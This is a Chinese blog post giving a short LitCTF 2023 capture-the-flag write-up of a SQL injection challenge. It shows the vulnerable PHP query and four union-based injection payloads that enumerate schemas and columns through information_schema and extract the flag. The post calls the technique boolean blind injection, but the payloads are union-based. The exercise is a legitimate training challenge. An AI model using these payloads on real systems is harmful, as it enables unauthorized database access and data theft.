[LitCTF 2023]这是什么?SQL !注一下 !

于 2024-04-23 21:30:22 发布
阅读量75 收藏
点赞数 3
文章标签: sql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_80115024/article/details/138138376
版权

练习的最后一道布尔盲注

打开实例

发现有好多层包裹,

"SELECT username,password FROM users WHERE id = ".'(((((('.$_GET["id"].'))))))';

标红代码的指在users表中有名为‘username’和‘password’两个列,id值为用户输入参数

爆库

-1))))))union select 1,group_concat(schema_name) from information_schema.schemata#

爆表

-1))))))union select 1,group_concat(column_name) from information_schema.columns where table_schema='ctftraining'#

爆列

-1))))))union select 1,group_concat(column_name) from information_schema.columns where table_schema=database()#

查字段

-1))))))union select 1,flag from ctftraining.flag#

得到flag

穿心莲滴丸
关注
  • 3
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
DirectSQL:直接从.NET执行SQL
02-06
直接执行SQL! 该.NET库是System.Data之上的非常瘦的数据库框架。 在此库中,您可以直接使用SQL,而不必担心连接,事务等的生命周期。 在许多数据库框架中,SQL的直接执行或多或少受到传统的阻碍。 该库解决了与此...
sql练习题学习!!!
07-17
sql练习题学习!!!
【Web】SQL入例题wp
uuzeray的博客
11-09 370
明天c语言月测了,再写博客就只能裸考了罢(悲)
LitCTF2023 WP
一个普普通通的博客
05-18 700
LitCTF2023是郑州轻工业大学首届网络安全赛,作为第一次举办的网络安全类型的校赛,它的难度极其容易,很加适合对CTF感兴趣但是没有基础的同学。
LitCTF2023
Naxi_rose的博客
05-17 420
题目很基础,有些题一言难尽。还是太菜了,做题做少了。多多刷题!!但是还有收获的,思路,xff的替代,sql 爆库 ,session伪造。
LitCTF-web-WP(部分)
m0_55400802的博客
05-15 614
CSDN内容合伙人2023年CSDN新星计划Web安全方向导师。华为MindSpore截至目前最年轻的优秀开发者阿里云专家博主、华为网络安全云享专家以及腾讯云自媒体分享计划博主。吉林师范大学CTF校队——SuD0战队的队长吉林师范大学网信网安学生负责人核心粉丝群超过50人带队里的师傅打了LitCTF,成绩对于初出茅庐的我们来说还不错。
2023年沪深股票证券交易日INSERT SQL及excel数据等文件
12-14
1、根据国务院办公厅关于2023年部分节假日安排的通知汇总的股票证券交易日和非交易日新增insert sql数据; 2、只需要修改对应的表名、字段名即可将交易日、非交易的数据导入到数据库; 3、有汇总的交易日明细数据...
常用的sql语句合集!
最新发布
06-17
1.基本的sql语句 2.sql的增删改查
SQL 语句中 where 条件后 写上 1=1 是什么意思!.doc
04-26
SQL 语句中 where 条件后 写上 1=1 是什么意思!.doc
LitCTF2023 郑州轻工业大学首届网络安全赛 WP 部分
Aluxian_的博客
05-14 6626
由于刚接触CTF没多久 还是属于萌新级别的(中专高中生)也没怎么打过比赛记录一下学习的过程大佬绕过即可,后续会继续加油努力。PS:记得所有的flag都改为NSSCTF或者LitCTF
第一届LitCTF-2023web部分wp
kinakouni的博客
05-14 403
LitCTF2023。简单题一并拿下,难题一律不会www总的来说难度是低的,不亏是新生赛,对于我这个小白来说可太有体验感了以此表扬(xxxx。
LitCTF 2023 web wp
Jay17的博客
05-14 1196
LitCTF 2023 web wp 全
LitCTF-2023-web部分
m0_74097148的博客
05-18 1777
也有多种解法,当然如果上传有黑名单限制 但是远程下载没有 则可以用远程下载去下载PHP木马文件,然后剩余的步骤和上传木马的操作一样 不多做说明。并且题目提示我们只有username, password两列, 不需要group by去判断列数了。输入如下图的内容, 下载后点击编辑文件即可看到flag。如果想要了解更多关于http头部的信息可以参考。
[LitCTF2023] web方向全题解wp
Leaf_initial的博客
05-14 2451
签到题,f12获取flag这里意看一下源代码,有彩蛋先留着。
[LitCTF 2023]刷题记录
rev1ve的博客
05-17 767
提示我们不是来自于pornhub.com,利用Referer。发现为文件上传,直接传php发现成功(啥过滤都没有)F12一下发现提示admin,admin,直接登录。题目提示vim编辑器,用kali打开文件。发现题目已经告诉我们sql语句的闭合方式。直接去/.index.php.swp下。我们ping一下,127.0.0.1。直接在game.js找到flag。我们得伪造admin,加密一下。打开题目,直接js找flag。发现有过滤,要绕过前端检测。再次输入命令,得到flag。找了半天,发现是改过的。
LitCTF2023 Reverse 题解及复现
OrientalGlass的博客
05-14 2342
使用解包工具时要意环境问题,这题是python3.8编写的,所以要用python3.8的环境,否则会缺少输出文件,建议使用anaconda管理python版本。关键代码是最后一段对flag的操作,不过这里可能是有意为之或者是反编译的问题,意思应该是flag[i]和flag[i+1]的数据异或后互换。经典的base64换表,第10和11行作用重复,12行也没有实际作用,此处的base表根本没有变化。关键就在于Probee代码中调用了check函数,该函数定义在ch中,分析程序逻辑不难写出解题脚本。
MyBatis 的动态 SQL 是什么?如何使用动态 SQL
05-05
MyBatis的动态SQL是一种在运行时根据条件生成SQL语句的技术,可以让我们在不同情况下使用不同的SQL语句来查询或更新数据。它可以很好地解决在实际开发中需要动态组合SQL语句的问题。 MyBatis提供了多种动态SQL语句...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值